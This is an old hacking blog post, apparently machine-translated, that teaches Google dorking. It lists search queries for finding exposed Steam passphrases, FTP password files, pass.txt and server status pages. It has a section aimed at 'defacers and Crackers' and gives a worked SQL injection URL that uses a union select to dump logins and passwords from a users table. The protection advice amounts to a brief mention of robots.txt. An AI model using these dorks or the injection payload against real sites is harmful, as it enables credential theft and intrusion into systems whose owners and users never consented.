LATEST: We are offering PENTESTING and WEB DEVELOPMENT service with low price Learn More

2/06/2012

Google Hacking - The Art Hacker Search

Hello friends,
After staying a while without posting anything for me really made you want to teach this technique of research using Google.
GH or Google Hacking is used in nearly everything in the area of ​​hacking and pen-test. With it we will find the vulnerable sites and applications.
Databases:
As you read this are being made countless websites and web pages most have vulnerabilities and can be found easily with search engines.
The most famous sites that list the dorks are:
IHS - http://www.hackersforcharity.org/ghdb/
Exploit-DB - http://www.exploit-db.com/google-dorks/

Looking Dorks:

Dorks are the famous "research" that make the search engine results to find the vision hacker sites would be vulnerable.
Soon after entering the database, we see some categories such as:
  • Files containing usernames
  • Sensitive Directories
  • Vulnerable Files
  • Among other
Let's say we want to find usernames, so I'll Files containing usernames.
When we find something that interests us, such as:
This will search for usernames and passwords for steam (www.steampowered.com) SteamApp.cfg taken from the file.
We see some sites or Dork Google Search:
intext: "SteamUserPassphrase =" intext: "SteamAppUser =" - "username" - "user"
Type this in google and it should show as a result hundreds of Steam User names, but we can use google for that.

Dorks in Pen-tests:

Let's analyze another case.
We have to make a pen-test on a site, we want to find information that is useful but only in that site.
Google provides us with the filter "site" or "allinurl:".
We want to know the status of the Apache server, insert the dork intitle: "Apache Status" "Apache Server Status for" with allinurl: www.site.com
Getting such as:

We have numerous opportunities to find, such as:
Database files:
filetype: xls inurl +: site.com
Password:
inurl: / cgi-bin/pass.txt site: site.com
filetype: ini "[FFFTP]" (pass | passwd | password | pwd) Web site: site.com
"Parent directory" + proftpdpasswd site: site.com
We prove that Google helps us find information on a certain site, but when we do not have a defined goal?

Dorks for defacers and Crackers:

Yes, 99% of defacers Crackers and use Google!
Why? If a site wants it has to be visited free and goals for the web programmer who is not stupid or anything uses these goals to promote high.
Something is common on the Internet to research a particular issue and see a forum, read the description to something like this:

For example:
www.linkdosite.com/pag_show_this.php?looknews=1 is vulnerable to SQL injection and can be exploited like this:
www.linkdosite.com/pag_show_this.php?looknews=-1+ union + all + select +1, login, password, 3,4,5 + from + users

How do I protect?

Google and other search engine or media should never be seen as something bad or destructive. He's just doing his job, help people find your site. If it was not your site would not be found and would not have many visitors.
Yet there are still limiting the search for example: do not let Google show the directory "/ login /" using the robots.txt file, this file is a script where the seeker should not go.
The tips are the same: Always keep your site fresh and make a pen-test of preference.

About Author:

Hi, Its me Aamir Khan, Owner of HACKING ARTICLES. I am an Ethical Hacker, Pro Blogger, addicted Web Developer and Security Researcher with experience in various aspects of Information Security. I am from Pakistan.Hacking is my passion and i wanna myself to be called as a LEGEND in this field.

Follow him @ Twitter | Facebook


0 comments:

Post a Comment

Your feedback is always appreciated. We will try to reply to your queries as soon as time allows.
Note:
1. Make sure to click the "Subscribe By Email" link below the comment to be notified of follow up comments and replies.
2. Please "Do Not Spam" - Spam comments will be deleted immediately upon our review.
3. Please "Do Not Add Links" to the body of your comment as they will not be published.
4. Only "English" comments shall be approved.
5. If you have a problem check first the comments, maybe you will find the solution there.